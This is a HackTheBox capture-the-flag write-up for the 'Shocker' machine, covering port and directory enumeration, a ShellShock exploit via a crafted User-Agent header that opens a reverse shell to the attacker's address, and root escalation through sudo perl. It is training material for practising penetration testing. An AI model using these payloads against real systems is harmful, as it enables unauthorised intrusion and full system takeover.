imported>Aghanim at 19:56, 12 January 2022

2022-01-12T19:56:18Z

New page

{{Infobox WriteUp
| name = Shocker
| platform = HackTheBox
| os = Linux
| difficulty = Easy
| techniques = ShellShock
}}

[[File:2022-01-image-96.png|thumb]]

This is rated an easy box, and for good reason, however, I spent a good amount of time just enumerating because the initial access was hidden well. For some who have encountered this vulnerability before, this would be a piece of cake, but I had never encountered ShellShock before so I spent a lot of time enumerating. Rooting this box was as simple as one command.

----

== Enumeration ==

I'll start off with a nmap scan to get an idea of whats running on the machine.

<syntaxhighlight lang="bash">
└─# nmap -sC -sV 10.10.10.56 -oN nmap.result
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-11 16:45 EST
Nmap scan report for 10.10.10.56
Host is up (0.031s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesnt have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.58 seconds
</syntaxhighlight>

Only two ports, '''80 '''and '''2222'''. OpenSSH is using an uncommon port. That however leads no way, so it will be ignored in the remainder of this writeup.

Vising the webserver we are welcomed by this page. A very simple page with not much content.

[[File:2022-01-image-97.png|thumb]]

<syntaxhighlight lang="bash">

Don't Bug Me!

</syntaxhighlight>

Using '''gobuster '''to find hidden directories.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/shocker]
└─# gobuster dir -u http://10.10.10.56/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/12 14:31:38 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 290]
/.htaccess (Status: 403) [Size: 295]
/.htpasswd (Status: 403) [Size: 295]
/cgi-bin/ (Status: 403) [Size: 294]
/index.html (Status: 200) [Size: 137]
/server-status (Status: 403) [Size: 299]

===============================================================
2022/01/12 14:31:52 Finished
===============================================================

</syntaxhighlight>

Nothing noteworthy. After alot of enumeration I started looking at '''/cgi-bin/'''. After some googling I found this.

>
'''ShellShock'''

Bash can also be used to run commands passed to it by applications and it is this feature that the vulnerability affects. One type of command that can be sent to Bash allows environment variables to be set. Environment variables are dynamic, named values that affect the way processes are run on a computer. The vulnerability lies in the fact that an '''attacker can tack-on malicious code to the environment variable, which will run once the variable is received'''.
[https://book.hacktricks.xyz/pentesting/pentesting-web/cgi https://book.hacktricks.xyz/pentesting/pentesting-web/cgi]

>
'''How Does ShellShock Work?'''

In layman’s terms, Shellshock is a vulnerability that allows systems containing a vulnerable version of Bash to be exploited to execute commands with higher privileges. This allows attackers to potentially take over that system.
[https://securityintelligence.com/articles/shellshock-vulnerability-in-depth/ https://securityintelligence.com/articles/shellshock-vulnerability-in-depth/]

So after reading this I editied my gobuster dir search and find a file, '''user.sh.'''

<syntaxhighlight lang="bash">

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/shocker]
└─# gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/common.txt -x cgi,sh,jpg,txt,html,php -b 403,404
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56/cgi-bin/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.1.0
[+] Extensions: cgi,sh,jpg,txt,html,php
[+] Timeout: 10s
===============================================================
2022/01/12 14:45:13 Starting gobuster in directory enumeration mode
===============================================================
/user.sh (Status: 200) [Size: 118]

===============================================================
2022/01/12 14:47:05 Finished
===============================================================

</syntaxhighlight>

And reading the file.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/shocker]
└─# cat user.sh
Content-Type: text/plain

Just an uptime test script

14:07:18 up 21:24, 0 users, load average: 0.19, 0.09, 0.03
</syntaxhighlight>

== Initial Access ==

As we mentioned earlier, the server is vulnerable to ShellShock which is a vulnerability in Bash which would allow us to execute arbitrary commands and gain remote shell on the machine.

<syntaxhighlight lang="bash">
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.10.17/4444 0>&1' http://10.10.10.56/cgi-bin/
</syntaxhighlight>

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/shocker]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.56] 42834
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ ls
ls
user.sh
shelly@Shocker:/usr/lib/cgi-bin$ pwd
pwd
/usr/lib/cgi-bin
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly
shelly@Shocker:/usr/lib/cgi-bin$ id
id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
shelly@Shocker:/usr/lib/cgi-bin$
</syntaxhighlight>

== Root ==

Getting root on this was extremly easy. After doing the usual enumeration I found that the user '''Shelly''' could run '''perl''' as sudo.

shelly@Shocker:/$ sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/$ sudo perl -e 'exec "/bin/sh";'
# id
uid=0(root) gid=0(root) groups=0(root)

</pre>

[[Category:HackTheBox]]
[[Category:Linux]]
[[Category:Write-ups]]

Write-ups/HTB/Shocker - Revision history

imported>Aghanim at 19:56, 12 January 2022